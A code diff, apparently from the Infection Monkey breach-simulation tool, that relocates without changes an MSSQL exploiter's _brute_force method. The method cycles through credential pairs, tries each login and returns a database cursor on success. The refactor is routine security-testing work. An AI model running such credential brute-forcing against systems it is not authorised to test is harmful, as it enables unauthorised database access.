Agent: Move _brute_force()

monkey/infection_monkey/exploit/mssqlexec.py

@@ -89,6 +89,64 @@ class MSSQLExploiter(HostExploiter):
         self.exploit_result.propagation_success = True
         return self.exploit_result
 
+    def _brute_force(self, host, port, users_passwords_pairs_list):
+        """
+        Starts the brute force connection attempts and if needed then init the payload process.
+        Main loop starts here.
+
+        Args:
+            host (str): Host ip address
+            port (str): Tcp port that the host listens to
+            users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce
+            with
+
+        Return:
+            True or False depends if the whole bruteforce and attack process was completed
+            successfully or not
+        """
+        # Main loop
+        # Iterates on users list
+        credentials_iterator = interruptible_iter(
+            users_passwords_pairs_list,
+            self.interrupt,
+            "MSSQL exploiter has been interrupted",
+            logging.INFO,
+        )
+
+        for user, password in credentials_iterator:
+            try:
+                # Core steps
+                # Trying to connect
+                conn = pymssql.connect(
+                    host,
+                    user,
+                    password,
+                    port=port,
+                    login_timeout=self.LOGIN_TIMEOUT,
+                    timeout=self.QUERY_TIMEOUT,
+                )
+                logger.info(
+                    f"Successfully connected to host: {host} using user: {user} and password"
+                )
+                self.exploit_result.exploitation_success = True
+                self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
+                self.report_login_attempt(True, user, password)
+                cursor = conn.cursor()
+                return cursor
+            except pymssql.OperationalError as err:
+                logger.info(f"Connection to MSSQL failed: {err}")
+                self.report_login_attempt(False, user, password)
+                # Combo didn't work, hopping to the next one
+                pass
+
+        logger.warning(
+            "No user/password combo was able to connect to host: {0}:{1}, "
+            "aborting brute force".format(host, port)
+        )
+        raise FailedExploitationError(
+            "Bruteforce process failed on host: {0}".format(self.host.ip_addr)
+        )
+
     def _create_temp_dir(self):
         logger.debug(f"Creating a temporary directory: {MSSQLExploiter.TMP_DIR_PATH}")
 
@@ -153,61 +211,3 @@ class MSSQLExploiter(HostExploiter):
     def _stop_monkey_server(http_thread):
         http_thread.stop()
         http_thread.join(LONG_REQUEST_TIMEOUT)
-
-    def _brute_force(self, host, port, users_passwords_pairs_list):
-        """
-        Starts the brute force connection attempts and if needed then init the payload process.
-        Main loop starts here.
-
-        Args:
-            host (str): Host ip address
-            port (str): Tcp port that the host listens to
-            users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce
-            with
-
-        Return:
-            True or False depends if the whole bruteforce and attack process was completed
-            successfully or not
-        """
-        # Main loop
-        # Iterates on users list
-        credentials_iterator = interruptible_iter(
-            users_passwords_pairs_list,
-            self.interrupt,
-            "MSSQL exploiter has been interrupted",
-            logging.INFO,
-        )
-
-        for user, password in credentials_iterator:
-            try:
-                # Core steps
-                # Trying to connect
-                conn = pymssql.connect(
-                    host,
-                    user,
-                    password,
-                    port=port,
-                    login_timeout=self.LOGIN_TIMEOUT,
-                    timeout=self.QUERY_TIMEOUT,
-                )
-                logger.info(
-                    f"Successfully connected to host: {host} using user: {user} and password"
-                )
-                self.exploit_result.exploitation_success = True
-                self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
-                self.report_login_attempt(True, user, password)
-                cursor = conn.cursor()
-                return cursor
-            except pymssql.OperationalError as err:
-                logger.info(f"Connection to MSSQL failed: {err}")
-                self.report_login_attempt(False, user, password)
-                # Combo didn't work, hopping to the next one
-                pass
-
-        logger.warning(
-            "No user/password combo was able to connect to host: {0}:{1}, "
-            "aborting brute force".format(host, port)
-        )
-        raise FailedExploitationError(
-            "Bruteforce process failed on host: {0}".format(self.host.ip_addr)
-        )